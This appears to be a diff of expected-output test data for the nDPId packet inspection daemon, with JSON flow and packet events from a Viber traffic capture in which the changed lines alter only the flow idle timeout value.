00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1527155648506,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":183,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":183,"pkt_l4_len":149,"thread_ts_msec":1527155648506,"pkt":"MAdNo1+nAA6OMNv9CABFAACpXKlAAEARXCrAqAAPwKgAEQA1rVgAlY7c00mBgAABAAUAAAAAB3ZlbmV0aWEDaWFkBmFwcGJveQNjb20AAAEAAcAMAAUAAQAAAQIAGQF5A3NzbAZnbG9iYWwGZmFzdGx5A25ldADANAABAAEAAAAdAASXZQGCwDQAAQABAAAAHQAEl2VBgsA0AAEAAQAAAB0ABJdlgYLANAABAAEAAAAdAASXZcGC"} 00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":211,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155648481,"flow_last_seen":1527155648506,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1527155648506,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":44376,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"venetia.iad.appboy.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"151.101.1.130"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":212,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155648513,"flow_last_seen":1527155648513,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155648513,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"151.101.1.130","src_port":55746,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1527155648513,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155648513,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8cjBAAEAGbuvAqAARl2UBgtnCAbvgBRgtAAAAAKAC\/\/+wcAAAAgQFtAQCCAoAIWodAAAAAAEDAwc="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1527155648523,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155648523,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAADoG5xuXZQGCwKgAEQG72cJzm\/EW4AUYLqAScSBKVAAAAgQFtAQCCArIDMgpACFqHQEDAwk="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1527155648526,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155648526,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0cjFAAEAGbvLAqAARl2UBgtnCAbvgBRguc5vxF4AQAq3nkgAAAQEICgAhaiDIDMgp"} -00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155648513,"flow_last_seen":1527155648533,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1527155648533,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"151.101.1.130","src_port":55746,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"venetia.iad.appboy.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":212,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155648513,"flow_last_seen":1527155648513,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155648513,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"151.101.1.130","src_port":55746,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1527155648513,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155648513,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8cjBAAEAGbuvAqAARl2UBgtnCAbvgBRgtAAAAAKAC\/\/+wcAAAAgQFtAQCCAoAIWodAAAAAAEDAwc="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1527155648523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155648523,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAADoG5xuXZQGCwKgAEQG72cJzm\/EW4AUYLqAScSBKVAAAAgQFtAQCCArIDMgpACFqHQEDAwk="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1527155648526,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155648526,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0cjFAAEAGbvLAqAARl2UBgtnCAbvgBRguc5vxF4AQAq3nkgAAAQEICgAhaiDIDMgp"} +00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155648513,"flow_last_seen":1527155648533,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1527155648533,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"151.101.1.130","src_port":55746,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"venetia.iad.appboy.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"viber.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1527155666982,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1527155666982,"pkt":"AQBeAAD7MAdNo1+nCABFAABZIsxAAP8RtxLAqAAR4AAA+xTpFOkARSvGAAUAAAACAAAAAAAACV84MDU3NDFDOQRfc3ViC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAcAbAAwAAQ=="} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":257,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1527155638428,"flow_last_seen":1527155670525,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":2871,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1527155670525,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"52.0.253.101","src_port":33208,"dst_port":4244,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1527155638428,"flow_last_seen":1527155670525,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":2871,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1527155670525,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"52.0.253.101","src_port":33208,"dst_port":4244,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155670632,"flow_last_seen":1527155670632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155670632,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":45424,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1527155670632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155670632,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8WoBAAEAGCJrAqAAREskEILFwAbuQXSU3AAAAAKAC\/\/+HxQAAAgQFtAQCCAoAIX+3AAAAAAEDAwc="} +00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":257,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1527155638428,"flow_last_seen":1527155670525,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":2871,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1527155670525,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"52.0.253.101","src_port":33208,"dst_port":4244,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1527155638428,"flow_last_seen":1527155670525,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":2871,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1527155670525,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"52.0.253.101","src_port":33208,"dst_port":4244,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155670632,"flow_last_seen":1527155670632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155670632,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":45424,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1527155670632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155670632,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8WoBAAEAGCJrAqAAREskEILFwAbuQXSU3AAAAAKAC\/\/+HxQAAAgQFtAQCCAoAIX+3AAAAAAEDAwc="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155670640,"flow_last_seen":1527155670640,"flow_idle_time":180000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1527155670640,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00782{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1527155670640,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":299,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":299,"pkt_l4_len":265,"thread_ts_msec":1527155670640,"pkt":"AA6OMNv9MAdNo1+nCABFiAEdfMxAAEAR5NnAqAAREskEILhDHzEBCRHz7fYBAAUArBk1jI9k5EcHridUEQCowEO4MgAAAEMBABABAK45kpFjAQAAAAAAACXfTU7hzTcbXJq8JtnTC0sBuzmzAAAAAAAAAAADAAEAZgIAZwABeAAAAAAAAIAAvcYFlBohustZk1e\/8OyZiSqP86k39WGwDkG7f\/rMnT2tcfHi3zlsEfu0kKTP5bAY2qxB7\/oc6uBQ0Wmie0yDB6f1EwNZ4BrIBNZIXKB4sgy96MQL790EZYw7fY9vCydMCFozrGypXQPtcVrV5xCrsYqA8zuDlnCD1lV04sfnGYMAAAAAAAAAAEcFAAA4AAAAEABBbmRyb2lkLDguOS4wLjIAAAA="} 00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155670640,"flow_last_seen":1527155670640,"flow_idle_time":180000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1527155670640,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7985,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} @@ -100,19 +100,19 @@ 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"viber.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1527155670640,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1527155670640,"pkt":"AA6OMNv9MAdNo1+nCABFiAA+fM1AAEAR5bfAqAAREskEILhDHzMAKi7T7fYZAKwZNYyPZORHJd9NTuHNNxtcmrwm2dMLSwG7ObMAAA=="} 00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"viber.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155670640,"flow_last_seen":1527155670640,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1527155670640,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7987,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1527155670640,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1527155670640,"pkt":"AA6OMNv9MAdNo1+nCABFiAAwfM5AAEAR5cTAqAAREskEILhDHzEAHFuJ7fYJALM5kpFjAQAArBk1jI9k5Ec="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1527155670663,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155670663,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAACsGeBoSyQQgwKgAEQG7sXDMrFlhkF0lOKASaN8nuwAAAgQFtAQCCAoAWtCxACF\/twEDAwc="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1527155670663,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155670663,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAACsGeBoSyQQgwKgAEQG7sXDMrFlhkF0lOKASaN8nuwAAAgQFtAQCCAoAWtCxACF\/twEDAwc="} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"viber.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1527155670672,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1527155670672,"pkt":"MAdNo1+nAA6OMNv9CABFAAAwfVFAACsR+skSyQQgwKgAER8zuEMAHAAy7fYaAKwZNYyPZORHMkN8XkO4AMg="} 00538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1527155670673,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1527155670673,"pkt":"MAdNo1+nAA6OMNv9CABFAABofVBAACsR+pISyQQgwKgAER8xuEMAVGj37fYMAAEArBk1jI9k5EcyQ3xeQ7iuOZKRYwEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIAAAAAAAAAAAAAAAAAAAAAA=="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1527155670673,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155670673,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0WoFAAEAGCKHAqAAREskEILFwAbuQXSU4zKxZYoAQAq28sQAAAQEICgAhf78AWtCx"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":269,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155671066,"flow_last_seen":1527155671066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155671066,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1527155671066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155671066,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8FY9AAEAG0gLAqAARNrtbtr+YAbtog5WsAAAAAKAC\/\/+1DQAAAgQFtAQCCAoAIYAjAAAAAAEDAwc="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1527155671237,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155671237,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAOYGQZE2u1u2wKgAEQG7v5iCE\/ghaIOVraASaN+HqAAAAgQFtAQCCAosBh44ACGAIwEDAwg="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1527155671240,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155671240,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0FZBAAEAG0gnAqAARNrtbtr+YAbtog5WtghP4IoAQAq0cfAAAAQEICgAhgE8sBh44"} -00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":276,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155671066,"flow_last_seen":1527155671250,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":181,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155671250,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"brahe.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":278,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155671066,"flow_last_seen":1527155671423,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1629,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1527155671423,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"brahe.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01266{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":281,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1527155671066,"flow_last_seen":1527155671423,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5054,"flow_avg_l4_payload_len":561,"midstream":0,"thread_ts_msec":1527155671423,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"brahe.apptimize.com","server_names":"*.apptimize.com,apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Organization Validation Secure Server CA","subjectDN":"C=US, ST=CA, L=Mountain View, O=Apptimize, Inc, OU=PremiumSSL Wildcard, CN=*.apptimize.com","alpn":"http\/1.1","fingerprint":"BC:4C:8F:EC:8B:7B:85:BD:54:61:8B:C0:7B:E7:A2:69:0B:F2:49:E5"}} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":357,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155679410,"flow_last_seen":1527155679410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155679410,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":33744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1527155679410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155679410,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8V2ZAAEAGC9HAqAAREskEA4PQAbvgGt8vAAAAAKAC\/\/+jOgAAAgQFtAQCCAoAIYhJAAAAAAEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1527155670673,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155670673,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0WoFAAEAGCKHAqAAREskEILFwAbuQXSU4zKxZYoAQAq28sQAAAQEICgAhf78AWtCx"} 